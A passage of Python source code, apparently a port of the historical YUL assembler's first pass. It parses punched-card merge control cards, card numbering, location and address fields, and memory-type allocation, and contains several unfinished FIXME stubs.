self._yul.switch |= SwitchBit.CORRECT
self._real.health = 0
elif common == 'CHANGE':
# Seek OK card number if "CHANGE".
self._yul.switch &= ~SwitchBit.CORRECT
else:
# Cuss bad location field.
self._real.health |= Bit.BIT8
# Note type, analyze address field.
self._real.health |= HealthBit.CARD_TYPE_CARDNO
cn_limit = self.mccd_adrf()
if self._field_cod[0] != Bit.BIT2:
# Cuss bad address field.
self._real.health |= Bit.BIT9
raise BadMerge()
# Reject "CARDNO" for any sin.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
raise BadMerge()
# Set up card whose number is to be chgd.
self.find_cdno()
# Change external card number.
self._tape.card = self._tape.card[0] + ('%06d' % cn_limit) + self._tape.card[7:]
self._tape.mark()
# On log card, change is superficial only.
if self._tape.card[0] == 'L':
if self._tape.card[1:7] != '000000':
return self.send_ccno()
# ..though SQB setting is blanked.
self._tape.card = self._tape.card[0] + ' ' + self._tape.card[7:]
return self.send_ccno()
# Clear possible sequence break bit.
self._tape.clear_seq_break()
# Change internal card number.
self._tape_cdno = cn_limit
# If seq. br., set external card number to SEQBRK and set bit 43.
if self._tape_cdno == Bit.BIT6:
self._tape.card = self._tape.card[0] + 'SEQBRK' + self._tape.card[7:]
self._tape.set_seq_brk()
return self.send_ccno()
def send_ccno(self):
# Send "CARDNO", "CARDNS", or "DELETE".
self.send_popo(self._real)
# Branch if a section was renumbered.
if self._real.card[17:23] == 'CARDNO':
# New number is criterion for next real.
self._real_cdno = self._tape_cdno
# Process accepted card, get another real.
return self.proc_tape()
# If renumber is now under way, compare new number with last card's renumber.
if self._yul.switch & SwitchBit.RENUMBER:
self._last_cdno = self._field_cod[1]
# Process card with renumbering disabled.
self._renum_disabled = True
self.proc_tape()
self._renumber = self._last_cdno
# For CARDNS, keep old sequence criterion.
self._last_cdno = self._real_cdno
# Exit if renumbering is now under way.
if self._yul.switch & SwitchBit.RENUMBER:
return
# Call for partial renumbering.
self._yul.switch |= SwitchBit.RENUMBER
# Make it stop after first log card.
self._restart_log = True
return
# Proceudre to detect and process "DELETE" cards.
def delete_cq(self):
# Branch if not a "CARDNO" code.
if self._real.card[17:23] != 'DELETE':
return self.insert_cq()
# Branch if location field not "OUTOFSEQ".
if self._real.loc_field() == 'OUTOFSEQ':
# Set up search for bad card number.
self._yul.switch |= SwitchBit.CORRECT
# Never cuss this card number.
self._real.health = 0
else:
# Cuss bad location field.
if not self._real.loc_field().isspace():
self._real.health |= Bit.BIT8
# Set up search for OK card number.
self._yul.switch &= ~SwitchBit.CORRECT
# Analyze address field.
self._real.health |= HealthBit.CARD_TYPE_DELETE
cn_limit = self.mccd_adrf()
# Branch if address field not blank.
if self._field_cod[0] == 0:
# Reject singleton delete for bad card no.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
self._real_cdno = self._last_cdno
raise BadMerge()
# Go find single card to be deleted.
self.find_cdno()
else:
if self._field_cod[0] != Bit.BIT1:
# Cuss bad address field.
self._real.health |= Bit.BIT9
self._real_cdno = self._last_cdno
raise BadMerge()
# Branch if first cardno is not seq break.
if self._real_cdno != Bit.BIT6:
# Cuss if 1st cardn not less than 2nd.
if self._real_cdno >= cn_limit:
self._real.health |= Bit.BIT12
self._real_cdno = self._last_cdno
raise BadMerge()
else:
# Branch if 2nd cardno is not seq break.
if cn_limit == Bit.BIT6:
self._real.health |= Bit.BIT12
self._real_cdno = self._last_cdno
raise BadMerge()
# Reject "DELETE" card for any sin.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
self._real_cdno = self._last_cdno
raise BadMerge()
# Set up card to be deleted.
self.find_cdno()
# Fetch next card to look at number.
while True:
self._tape = self.get_tape()
if cn_limit <= self._tape_cdno:
break
# Second number must match existing one.
if cn_limit != self._tape_cdno:
self._real.health |= Bit.BIT11
self._real_cdno = self._last_cdno
raise BadMerge()
# Send "DELETE" card.
self._real_cdno = self._last_cdno
self.send_popo(self._real)
# Allow deletion of any but "END OF" card.
if self._tape.cardno_wd() == self._end_of.cardno_wd():
# Keep it and maybe insert before it.
self._yul.switch |= SwitchBit.TAPE_KEPT
else:
# End of deletion process.
self._yul.switch &= ~SwitchBit.TAPE_KEPT
# Procedure to detect and process "INSERT" cards.
def insert_cq(self):
if self._real.card[17:23] != 'INSERT':
return self.not_mccd()
# FIXME
pass
# Common procedure when merging is given up for lost for any reason.
def bad_merge(self):
# Send bad merge control card.
self.send_popo(self._real)
# Type most guilty card.
self._real.card = self._real.card[:7] + ' ' + self._real.card[8:]
self._mon.mon_typer(self._real.card)
# Announce rejection of task.
self._real = POPO(health=HealthBit.CARD_TYPE_ENDERR,
card='E■■■■■■ATHIS TASK IS REJECTED. RESUBMIT CORRECTED DECK WITH SAME DIRECTOR CARD. ')
self.send_popo(self._real)
# Loop to accept remaining tape cards.
while self._tape is not None:
self.proc_tape()
self._tape = self.get_tape()
# See whether to throw out remaining real cards, eing careful not to announce
# same if there are none.
self.get_card()
if self._real is not None:
# FIXME: HEAVE HO
pass
self._end_yul += ' ≠'
return self.end_pass_1()
# Subroutine in pass 1 to find the tape card to which a merge control card refers.
# Exits to BAD MERGE if no exact card number match is found before a sequence break.
def find_cdno(self):
while True:
# Branch if tape card not sequence break.
if self._tape_cdno == Bit.BIT6:
# Always illegal to find an "END OF" card. Branch if real card not sequence break.
if self._tape.cardno_wd() == self._end_of.cardno_wd() or self._tape_cdno != self._real_cdno:
# Cuss failure to find match.
self._real.health |= Bit.BIT10
raise BadMerge()
# Branch if not seeking bad card number.
if not self._yul.switch & SwitchBit.CORRECT:
return
# Cuss illegal location field.
self._real.health |= Bit.BIT8
raise BadMerge()
# Branch if no match yet.
if self._tape_cdno == self._real_cdno:
# Branch if looking for bad card number and desired bad card no. found.
if self._yul.switch & SwitchBit.CORRECT:
if self._tape.health != 0:
return
# Bad card number implies no match.
elif self._tape.health == 0:
return
# Process a tape card and look again
self.proc_tape()
self._tape = self.get_tape()
# We get to NOT MCCD for every real card that is not a merge control card.
def not_mccd(self):
if self._real.health > 0:
# Card no. error in revision cards is bad.
self._real.health |= HealthBit.CARD_TYPE_ENDERR
raise BadMerge()
# Branch if real card precedes tape card.
if self._real_cdno != self._tape_cdno:
return self.proc_real()
# Force same if real card is "TUCK-IN".
if self._real.card[0] == 'T':
self._real.card = 'L' + self._real.card[1:]
return self.proc_real()
# Force same if tape card is "END OF".
if self._tape.cardno_wd() == self._end_of.cardno_wd():
return self.proc_real()
# Otherwise replace tape card with real.
self._yul.switch &= ~SwitchBit.TAPE_KEPT
return self.proc_real()
def proc_real(self):
return self.process(self._real, self._real_cdno)
def proc_tape(self):
# Unkeep and process tape card.
self._yul.switch &= ~SwitchBit.TAPE_KEPT
return self.process(self._tape, self._tape_cdno)
def process(self, popo, cdno):
# Final sequence checking before processing.
if (cdno <= self._last_cdno) and (cdno != Bit.BIT6):
# Indicate card number out of sequence.
popo.health |= Bit.BIT7
else:
# Clear possible error bit, tab to exit.
popo.health &= ~Bit.BIT7
self._last_cdno = cdno & ~Bit.BIT6
if (ord(popo.card[7]) & 0xF) == 9:
popo.health |= HealthBit.CARD_TYPE_RIGHTP
return self.send_popo(popo)
if popo.card[0] == 'R':
popo.health |= HealthBit.CARD_TYPE_REMARK
return self.send_popo(popo)
if popo.card[0] == 'A':
popo.health |= HealthBit.CARD_TYPE_ALIREM
return self.send_popo(popo)
if popo.card[0] == 'P':
popo.health |= HealthBit.CARD_TYPE_REMARK
return self.send_popo(popo)
if popo.card[0] == 'L':
if self._log_renum:
self._log_renum = False
self._yul.switch |= SwitchBit.RENUMBER
# Branch if dashes should be put in date.
if popo.card[67:69] != ' ' or popo.card[70:72] != ' ':
popo.card = popo.card[:69] + '-' + popo.card[70:72] + '-' + popo.card[73:]
# FIXME: Send a dummy acceptor ahead of a marked log card entering as a member of a called subro
popo.health |= HealthBit.CARD_TYPE_REMARK
return self.send_popo(popo)
# Check for "END OF" information from tape or (new program or subro) from pass 0.
if popo.cardno_wd() == self._end_of.cardno_wd():
popo.health |= HealthBit.CARD_TYPE_END_OF
return self.end_of(popo)
op_field = popo.op_field()[1:7]
if self._early:
if op_field == 'MEMORY':
return self.memory(popo)
if op_field == 'SEGNUM':
return self.segnum(popo)
self._early = False
common, value = self.anal_subf(op_field, popo)
operation = common.strip()
try:
if self._field_cod[0] is None:
raise IllegalOp()
elif self._field_cod[0] in (0, FieldCodBit.SYMBOLIC):
if operation != '' and operation[-1] == '*':
popo.health |= HealthBit.ASTERISK
operation = operation[:-1]
if operation in self.op_thrs:
if isinstance(self.op_thrs[operation], int):
opcode = self.op_thrs[operation] & ~Bit.BIT37
if self._op_found is None:
popo.health |= (opcode << 16)
else:
self._op_found(popo, opcode)
popo.health |= HealthBit.CARD_TYPE_INSTR
else:
self.op_thrs[operation](popo)
return
else:
raise IllegalOp()
elif not self._field_cod[0] & FieldCodBit.UNSIGNED:
raise IllegalOp()
else:
popo.health |= (value << self.mod_shift)
if value <= self.max_num_op:
popo.health |= HealthBit.CARD_TYPE_INSTR
else:
raise IllegalOp()
except IllegalOp:
return self.illegop(popo)
return self.inst_dec_oct(popo)
def end_of(self, popo):
if not self._send_endo:
self._send_endo = True
# The subroutines are known.
self._yul.switch |= SwitchBit.KNOW_SUBS
# Prohibit renumbering in subroutines.
self._yul.switch &= ~SwitchBit.RENUMBER
# FIXME: set up first subro
# FIXME: set up next subro
# Exit via SEND POPO unless freezing subs.
if not self._yul.switch & SwitchBit.FREEZE:
return self.send_popo(popo)
def illegop(self, popo):
self._yul.switch &= ~(Bit.BIT25 | Bit.BIT26 | Bit.BIT27)
self._yul.switch |= MemType.FIXED
self._loc_state = 0
self.location(popo, blank=True)
popo.health &= ~HealthBit.CARD_TYPE_MASK
popo.health |= HealthBit.CARD_TYPE_ILLOP
return self.reg_incon(popo, translate_loc=False)
def inst_dec_oct(self, popo):
self._yul.switch &= ~MemType.MEM_MASK
self._yul.switch |= MemType.FIXED
if popo.card[0] == 'J':
# FIXME: handle leftovers
translate_loc = False
else:
translate_loc = True
return self.reg_incon(popo, translate_loc)
def reg_incon(self, popo, translate_loc=True):
if translate_loc:
self._loc_state = 0
self.location(popo)
popo.health |= self._loc_state
return self.send_popo(popo)
def location(self, popo, blank=False):
self._field_cod[1] = None
symbol = None
new_health = 0
# Initialize transform address
sym_xform = self._xforms[0]
if not blank:
# Analyze location field.
common, value = self.anal_subf(popo.loc_field(), popo)
if self._field_cod[0] == FieldCodBit.SYMBOLIC:
# Signal symbolic loc.
self._loc_state |= LocStateBit.SYMBOLIC
# Aanalyze history of symbol.
sym_name = common.strip()
symbol = self.anal_symb(sym_name)
if symbol is None:
# symbol is None if sym tab full.
self._loc_state |= LocStateBit.FULL
# In which case treat loc as blank.
else:
# Using old symbol health as rel address, get address of transform word.
sym_xform = self._xforms[symbol.health]
new_health = (sym_xform >> 8*4) & 0xF
elif self._field_cod[0] != None:
if self._field_cod[0] & FieldCodBit.UNSIGNED:
self._field_cod[1] = self._loc_ctr
self._loc_ctr = value
loc_value = self._loc_ctr
if self.incr_lctr():
self._field_cod[1] = None
if loc_value > self.max_loc:
self._loc_ctr = ONES
# Signal oversize.
self._loc_state |= LocStateBit.OVERSIZE
# Use oversize transform on symbol health.
new_health = (sym_xform >> 7*4) & 0xF
loc_value = 0
if self._field_cod[1] is not None:
self._loc_ctr = self._field_cod[1]
loc_value = self._loc_ctr
self.incr_lctr()
self.loc_exit(loc_value, symbol, new_health)
else:
self.ok_l_size(loc_value, symbol, sym_xform, new_health)
def loc_exit(self, loc_value, symbol, new_health):
self._loc_state |= loc_value
if self._loc_state & LocStateBit.SYMBOLIC:
self.sy_def_xit(loc_value, symbol, new_health)
def sy_def_xit(self, loc_value, symbol, new_health):
if symbol is None:
return False
# Branch if this is the only definition.
if symbol.health == 0:
symbol.value = loc_value
symbol.health = new_health
return
symbol = copy.deepcopy(symbol)
symbol.value = loc_value
symbol.health = new_health
sym_fit = self._yul.sym_thr.add(symbol)
if not sym_fit:
# Location-symbol-didn't-fit-in-table-flg.
self._loc_state |= Bit.BIT17
def ok_l_size(self, loc_value, symbol, sym_xform, new_health):
# Look up memory type.
midx = 0
while loc_value > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
bad = False
# Branch if type doesn't match that suplyd.
if (self._yul.switch & MemType.MEM_MASK) != mem_type:
new_health = (sym_xform >> 6*4) & 0xF
self._loc_state |= LocStateBit.WRONG_TYPE
if self._field_cod[1] is not None:
self._loc_ctr = self._field_cod[1]
loc_value = self._loc_ctr
self.incr_lctr()
self.loc_exit(loc_value, symbol, new_health)
return
if sym_xform == self._xforms[5]:
if symbol.value < 0:
leftover_type = MemType.ERASABLE
else:
leftover_type = MemType.FIXED
if (self._yul.switch & MemType.MEM_MASK) != leftover_type:
new_health = (sym_xform >> 6*4) & 0xF
if not self.avail(loc_value, reserve=True):
new_health = (sym_xform >> 5*4) & 0xF
self._loc_state |= LocStateBit.CONFLICT
self.loc_exit(loc_value, symbol, new_health)
def avail(self, loc_value, reserve=False):
available = True
avail_msk = 1 << (loc_value & 0x1F)
avail_idx = loc_value >> 5
if self._yul.av_table[avail_idx] & avail_msk:
available = False
if reserve:
self._yul.av_table[avail_idx] |= avail_msk
return available
def incr_lctr(self):
if self._loc_ctr >= ONES:
return False
self._loc_ctr += 1
return True
# Subroutine in pass 1 to break down the address field of a merge control card. That is, with an op
# code of "CARDNO" or "DELETE". Uses the sentence reader. Sets up FIELDCOD and CNLIMIT as follows:
# FIELD ALL BLANK FIELDCOD=0
# "THROUGH" WITH NUMBER FIELDCOD=B1, CNLIMIT=NUMBER
# "THRU" WITH NUMBER FIELDCOD=B1, CNLIMIT=NUMBER
# "TO" WITH NUMBER FIELDCOD=B2, CNLIMIT=NUMBER
# "WITH" WITH NUMBER FIELDCOD=B3, CNLIMIT=NUMBER
# The n number in the address field may be "SEQBREAK" or "SEQBRK" causing CNLIMIT to become ALF 10000000, or up ot 6
# decimal digits with an optional decimal point. If the number is present, there may be up to four digits to its
# left and up to two digits to its right. If the point is absent and there are four digits or less, the point is
# assumed to be at their immediate right. If the point is absent and there are five or six digits, the point is
# assumed to follow the fourth digit. At least one blank or other terminator must separate the two subfields, but
# no imbedded blanks are allowed in either subfield. If any of these rules are violated or there is a third
# subfield, FIELDCOD is set to all ones and the card is ignored and cussed at for a meaningless address field.
# The number set up in CNLIMIT is a standardized to six digits thus: ALF 0NNNNNN0, with a point assumed after char5.
def mccd_adrf(self):
# Set up and call sentence reader.
sentence = self._mon.phi_sentr(self._real.card[16:])
if sentence[0] == '':
# FIXME: Cuss if contains terminator only
self._field_cod[0] = 0
return None
# FIXME: Cuss unwanted terminators.
if sentence[0] in ('THRU', 'THROUGH'):
# Signify THROUGH and go to find number.
self._field_cod[0] = Bit.BIT1
elif sentence[0] == 'WITH':
# Signify WITH.
self._field_cod[0] = Bit.BIT3
elif sentence[0] == 'TO':
# Signify TO.
self._field_cod[0] = Bit.BIT2
else:
self._field_cod[0] = None
return None
if sentence[1] in ('SEQBREAK', 'SEQBRK'):
# Exit when number is sequence break.
return Bit.BIT6
if sentence[1].isspace():
# Bad exit when number is missing.
self._field_cod[0] = None
return None
s3 = -5
cn_limit = '000000'
cardno = sentence[1] + ' '
while True:
# Branch if not a digit.
if not cardno[0].isnumeric():
break
# Branch if this is the fifth digit.
s3 += 1
if s3 == 0:
break
# Move up previous digits. Plant a before-digit point.
cn_limit = cn_limit[1:4] + cardno[0] + cn_limit[4:]
# Move next character into position.
cardno = cardno[1:]
# If the fifth or earlier card is not a digit, it must be a decimal point or a blank.
skip_digits = False
if s3 != 0:
if cardno[0] == '.':
cardno = cardno[1:]
elif cardno[0] != ' ':
skip_digits = True
if not skip_digits:
# Plant first digit after point.
if cardno[0].isnumeric():
cn_limit = cn_limit[:4] + cardno[0] + cn_limit[5]
cardno = cardno[1:]
# Plant second digit after point.
if cardno[0].isnumeric():
cn_limit = cn_limit[:4] + cardno[0] + cn_limit[5]
cardno = cardno[1:]
# Bad exit if queer character. Bad exit if third subfield.
if cardno[0] != ' ' or sentence[2] != '':
self._field_cod[0] = None
return None
# Check for 999999 sequence break.
if cn_limit == '999999':
cn_limit = Bit.BIT6
return int(cn_limit)
def anal_symb(self, sym_name):
if len(sym_name) < 8:
# Append head if there is room
sym_name = ('%-7s%s' % (sym_name, self._head)).strip()
return self._yul.sym_thr[sym_name]
def segnum(self, popo):
# FIXME: IMPLEMENT SEGMENT ASSEMBLIES
return self.send_popo(popo)
def memory(self, popo):
adr_wd = self.adr_field(popo)
try:
if self._field_cod[0] is None:
raise BadMemory(Bit.BIT11)
us_num = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & us_num) != us_num:
raise BadMemory(Bit.BIT11)
popo.health |= (adr_wd[0] << 16) & 0xFFFF0000
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
elif self._field_cod[1] & FieldCodBit.POSITIVE:
adr_wd[1] = adr_wd[0] + adr_wd[1]
elif adr_wd[0] > abs(adr_wd[1]):
raise BadMemory(Bit.BIT11)
low_lim = adr_wd[0]
hi_lim = abs(adr_wd[1])
if hi_lim >= self.adr_limit:
raise BadMemory(Bit.BIT12)
popo.health |= hi_lim & 0xFFFF
common, value = self.anal_subf(popo.loc_field(), popo)
m_name = common.strip()
# Reject if not symbolic.
if not self._field_cod[0] & FieldCodBit.SYMBOLIC:
raise BadMemory(Bit.BIT8)
if m_name == 'ERASABLE':
# Attach erasable code to upper limit.
mem_type = MemType.ERASABLE
elif m_name == 'FIXED':
# Attach fixed code to upper limit.
mem_type = MemType.FIXED
elif m_name == 'SPEC/NON':
# Attach spec/non code to upper limit.
mem_type = MemType.SPEC_NON
else:
# Reject ill-formed memory card.
raise BadMemory(Bit.BIT8)
low_idx = 0
hi_idx = 0
if low_lim == 0:
# Does req cover all 1st present category.
if hi_lim > self.m_typ_tab[0][1]:
# Put req type in 1st category.
self.m_typ_tab[0] = (mem_type, self.m_type_tab[0][1])
else:
common = 0
# FIXME: go to CHECK TM1
else:
# Use reduced lower limit.
low_lim -= 1
# Find first category affected by request.
while low_lim > self.m_typ_tab[low_idx][1]:
low_idx += 1
hi_idx = low_idx
# go to CHK HI LIM
# Determine end of table.
end_typ_ta = len(self.m_typ_tab) - 1
# Search for last affected category.
while (hi_idx < end_typ_ta) and (hi_lim >= self.m_typ_tab[hi_idx][1]):
hi_idx += 1
# Branch if request is non-trivial.
if (low_idx == hi_idx) and (mem_type == self.m_typ_tab[low_idx][0]):
popo.health |= HealthBit.CARD_TYPE_MEMORY
return self.send_popo(popo)
if hi_lim == self.m_typ_tab[end_typ_ta][1] and low_idx < hi_idx:
self.m_typ_tab[hi_idx] = (mem_type, hi_lim)
# Remove entries entirely spanned.
obsolete = max(hi_idx - low_idx - 1, 0)
for i in range(obsolete):
self.m_typ_tab.pop(low_idx + 1)
hi_idx -= 1
if low_lim < self.m_typ_tab[low_idx][1] and mem_type != self.m_typ_tab[low_idx][0]:
# First affected category is being shortened.
if low_idx == hi_idx:
# The request splits the first category in two. Insert an entry corresponding to
# the bottom half.
old_type, old_lim = self.m_typ_tab[low_idx]
self.m_typ_tab.insert(low_idx, (old_type, low_lim))
if old_lim != hi_lim:
# The high limit does not reach the end of the old region. Insert a new
# entry for the new region's high limit.
self.m_typ_tab.insert(low_idx+1, (mem_type, hi_lim))
else:
# Change the type of the old node.
self.m_typ_tab[low_idx+1] = (mem_type, hi_lim)
popo.health |= HealthBit.CARD_TYPE_MEMORY
return self.send_popo(popo)
else:
# Push back the end of the first category.
self.m_typ_tab[low_idx] = (self.m_typ_tab[low_idx][0], low_lim)
if mem_type == self.m_typ_tab[low_idx][0]:
# The new category matches the type of the first category. Extend out its end.
self.m_typ_tab[low_idx] = (mem_type, hi_lim)
elif self.m_typ_tab[hi_idx][0] != mem_type:
# Insert a new category.
self.m_typ_tab.insert(hi_idx, (mem_type, hi_lim))
except BadMemory as e:
popo.health |= e.args[0]
popo.health |= HealthBit.CARD_TYPE_MEMORY
return self.send_popo(popo)
# Minor subroutines to shift two or three words right by one character.
def _3srt_1c(self, afield):
return ' ' + afield[:-1]
def _2srt_1c(self, afield):
return ' ' + afield[:15] + afield[16:]
# Subroutine to break an address field down into subfields. Results are delivered in self._fieldcod[0:2],
# and returned as adr_wd[0:2], as follows....
# _field_cod[0] all zero Blank address field
# _field_cod[0] None Illegal format
# _field_cod[1] all zero No modifier
# _field_cod[1] indicates signed num Modifier given in adr_wd[1]
# _field_cod[0] indicates symbolic Address symbol in adr_wd[0]
# _field_cod[0] indicates S or US num Value given in adr_wd[0]
def adr_field(self, popo):
adr_wd = [None, None]
if popo.address_1().isspace() and popo.address_2().isspace():
# Indicate blank address field and exit.
self._field_cod[0] = 0
return adr_wd
afield = popo.address_1() + popo.address_2() + ' '*8
# Initially assume no modifier.
self._field_cod[1] = 0
# Set up to look for signs initially.
also_main = None
# Maximum number of NBCs in a subfield.
max_nbcs = 8
while max_nbcs > 0:
# Branch when 2 words are right-justified.
while afield[15] == ' ':
afield = self._2srt_1c(afield)
max_nbcs -= 1
afield = self._3srt_1c(afield)
# Branch if seeking sign and sign not preceded by a blank
if also_main is None and afield[16] in '+-' and afield[15] == ' ':
# Analyze possible modifier
_, value = self.anal_subf(afield[16:], popo, check_blank=False)
# Branch if twasn't a signed numeric subf.
if (self._field_cod[0] & (FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED)) != FieldCodBit.NUMERIC:
break
# Branch if compound address.
if afield[:16].isspace():
# Exit for signed numeric field.
adr_wd[0] = value
return adr_wd
# Indicate presence of modifier.
self._field_cod[1] = self._field_cod[0]
# Save original form of rest of field.
also_main = afield[:16] + ' '*8
# Deliver value of modifier
adr_wd[1] = value
max_nbcs = 8
afield = afield[:16] + ' '*8
continue
# Branch if more NBCs to examine.
if afield[:16].isspace():
# Analyze possible main address.
_, value = self.anal_subf(afield[16:], popo, check_blank=False)
# Branch if not numeric.
if not self._field_cod[0] & FieldCodBit.NUMERIC:
break
# Exit when main address is S or US num.
adr_wd[0] = value
return adr_wd
else:
# Seek another non-blank character.
if max_nbcs == 0:
self._field_cod[0] = None
return adr_wd
if also_main is None:
# Set up putative symbolic subfield.
afield = popo.address_1() + popo.address_2() + ' '*8
else:
# Recover non-modifier part of adr field.
afield = also_main + ' '*8
# Branch when possible head found.
afield = self._3srt_1c(afield)
while afield[16] == ' ':
# Triple shift right to find head.
afield = self._3srt_1c(afield)
# Char preceded by non-blank isn't head.
if afield[15] != ' ':
# Backtrack after no-head finding.
afield = afield[:8] + afield[9:16] + afield[8] + afield[16:]
# Error if symbol is too long.
if afield[15] != ' ' or not afield[:8].isspace():
self._field_cod[0] = None
return adr_wd
# Finish backtracking.
afield = afield[:15] + afield[16] + afield[16:]
# Branch when symbol is normalized.
while afield[8] == ' ':
afield = afield[:8] + afield[9:16] + afield[8] + afield[16:]
# Exit when main address is symbolic.
adr_wd[0] = afield[8:16]
return adr_wd
if not afield[:8].isspace():
# Move symbol right to insert head.
while True:
afield = self._2srt_1c(afield)
# Error if no room for head.
if afield[15] != ' ':
self._field_cod[0] = None
return adr_wd
# Shift until normalized in afield[8:16].
if afield[:8].isspace():
break
# Insert head character.
afield = afield[:15] + afield[16] + afield[16:]
# Exit when main address is symbolic.
adr_wd[0] = afield[8:16]
return adr_wd
# Exit when main address is 1-char sym.
if afield[8:16].isspace():
adr_wd[0] = afield[16:24]
return adr_wd
# Move symbol left to insert head.
while True:
if afield[8] != ' ':
break
afield = afield[:16] + afield[17:24] + afield[15] + afield[24:]
# Insert head character.
afield = afield[:15] + afield[16] + afield[16:]
# Exit when main address is 1-char sym.
adr_wd[0] = afield[8:16]
return adr_wd
def anal_subf(self, common, popo, check_blank=True):
if check_blank and common.isspace():
self._field_cod[0] = 0
return common, None
self._field_cod[0] = FieldCodBit.NUMERIC | FieldCodBit.POSITIVE | FieldCodBit.UNSIGNED
while common[0] == ' ':
common = common[1:] + common[0]
subf = common
dig_file = None
if subf[0] != '0':
if subf[0] in '+-':
self._field_cod[0] &= ~FieldCodBit.UNSIGNED
if subf[0] == '-':
self._field_cod[0] &= ~FieldCodBit.POSITIVE
if subf[1:].isspace():
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
subf = subf[1:] + ' '
decimal = False
while subf[0] != ' ':
if not subf[0].isnumeric():
if (subf[0] != 'D'):
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
if not subf[1:].isspace():
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
if dig_file is None:
self._field_cod[0] = FieldCodBit.SYMBOLIC
return common, subf
# Set up conversion, decimal to binary
decimal = True
break
else:
if subf[0] in '89':
# Telltale bits for 8s and 9s.
self._field_cod[0] |= FieldCodBit.DECIMAL
if dig_file is None:
dig_file = '0'
if dig_file != '0' or subf[0] != '0':
dig_file += subf[0]
subf = subf[1:] + ' '
# Set complaint when 8s or 9s and no D.
if not decimal and self._field_cod[0] & FieldCodBit.DECIMAL:
popo.health |= Bit.BIT9
decimal = True
if decimal:
value = int(dig_file, 10)
else:
value = int(dig_file, 8)
if not self._field_cod[0] & FieldCodBit.POSITIVE:
value = -value
return common, value
def get_tape(self):
if self._sypt is None:
revno = self._yul.revno
if not self._yul.switch & SwitchBit.REPRINT:
revno -= 1
self._sypt = self._yul.yulprogs.find_sypt(self._yul.comp_name, self._yul.prog_name, revno)
if self._sypt is None:
return None
tape_card = self._sypt.readline()
if tape_card == '':
self._sypt.close()
return None
tape_card = tape_card[:80]
tape = POPO(health=0, card=tape_card)
# Clear asterisk if fetching main input, freezing subroutines, or not revising.
cacn = SwitchBit.KNOW_SUBS | SwitchBit.FREEZE_P1 | SwitchBit.REVISION
if (self._yul.switch & cacn) != (SwitchBit.KNOW_SUBS | SwitchBit.REVISION):
if not self._yul.switch & SwitchBit.REPRINT: # FIXME
tape.unmark()
# Branch if no sequence break
if tape.seq_break:
# Set up post-break criterion.
self._tape_cdno = Bit.BIT6
else:
card_no = tape.card[1:7]
tape_card_no = int(card_no, 10)
# Branch if sequence error.
if tape_card_no <= (self._tape_cdno & 0xFFFFFFFFF):
tape.health |= Bit.BIT7
# Set up new criterion
self._tape_cdno = tape_card_no
return tape
def head_tail(self, popo):
if popo.health & HealthBit.ASTERISK:
# Asterisk makes illegal op.
return self.illeg(popo)
self._head = popo.loc_field().strip()
if self._head == '':
self._head = ' '
else:
self._head = self._head[-1]
# Store head in POPO.
popo.health |= ALPHABET.index(self._head)
popo.health |= HealthBit.CARD_TYPE_HEAD
return self.send_popo(popo)
def erase(self, popo):
popo.health |= HealthBit.CARD_TYPE_ERASE
if popo.health & HealthBit.ASTERISK:
# Asterisk makes illegal op.
return self.illegop(popo)
# Decode address field.
adr_wd = self.adr_field(popo)
if self._field_cod[0] is None:
# When address is meaningless.
popo.health |= Bit.BIT11
return self.er_loc_sym(popo)
unsigned_mask = FieldCodBit.NUMERIC | FieldCodBit.UNSIGNED
if (self._field_cod[0] & unsigned_mask) == unsigned_mask:
# Lone numeric is both limits.
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
# Minus sign on modifier means thru.
elif not self._field_cod[1] & FieldCodBit.POSITIVE:
# Upper limit is negative of modifier.
adr_wd[1] = -adr_wd[1]
# Branch if limits are in OK order.
if adr_wd[0] > adr_wd[1]:
# Bad news when lower limit is greater.
popo.health |= Bit.BIT12
return self.er_loc_sym(popo)
else:
# For plus modifier, upper limit is sum.
adr_wd[0] += adr_wd[1]
return self.ch_er_size(popo, adr_wd)
elif self._field_cod[0] == FieldCodBit.SYMBOLIC:
# Error if symbol is not ..ANYWHERE..
if adr_wd[0] != 'ANYWHERE':
popo.health |= Bit.BIT11
return self.er_loc_sym(popo)
# Mark card as leftover.
popo.health |= Bit.BIT15
if self._field_cod[1] == 0:
# When symbol is alone.
adr_wd[1] = 0
return self.eras_lefto(popo, adr_wd)
# Bad news when modifier is minus.
if adr_wd[1] < 0:
popo.health |= Bit.BIT11
return self.er_loc_sym(popo)
# Branch if modifier has OK size
if adr_wd[1] <= 0o77777:
return self.eras_lefto(popo, adr_wd)
# When leftover block length too big.
popo.health |= Bit.BIT12
return self.er_loc_sym(popo)
else:
# Check for illegal loc cntr value.
if self._loc_ctr >= ONES:
popo.health |= Bit.BIT12
return self.er_loc_sym(popo)
# Branch if address field is not blank.
if self._field_cod[0] == 0:
# Erase current location only.
adr_wd[1] = 0
else:
# Branch if theres 2 signed numeric parts.
if self._field_cod[1] == 0:
adr_wd[1] = adr_wd[0]
else:
adr_wd[1] = adr_wd[0] + adr_wd[1]
# Area begins with loc cntr value anyhow.
adr_wd[0] = self._loc_ctr
# Negative upper limit means through here. Otherwise hi lim gave rel adres of end.
if adr_wd[1] >= 0:
adr_wd[1] += adr_wd[0]
# Ensure positive upper limit.
adr_wd[1] = abs(adr_wd[1])
# Branch if limits are in OK order.
if (adr_wd[0] > adr_wd[1]) or (adr_wd[1] >= self.adr_limit):
popo.health |= Bit.BIT12
return self.er_loc_sym(popo, adr_wd[0])
# For blank or signed num addresses only.
self._loc_ctr = adr_wd[1] + 1
return self.ch_er_size(popo, adr_wd)
def ch_er_size(self, popo, adr_wd):
low_lim = adr_wd[0]
hi_lim = adr_wd[1]
# When address size(s) are wrong.
if hi_lim > self.max_loc or low_lim >= ONES:
popo.health |= Bit.BIT12
return self.er_loc_sym(popo, low_lim)
# Put limits into card.
popo.health |= (low_lim << 16) | hi_lim
# Look up memory type of lower limit.
midx = 0
while low_lim > self.m_typ_tab[midx][1]:
midx += 1
mem_type = self.m_typ_tab[midx][0]
# Error if lower not erasable.
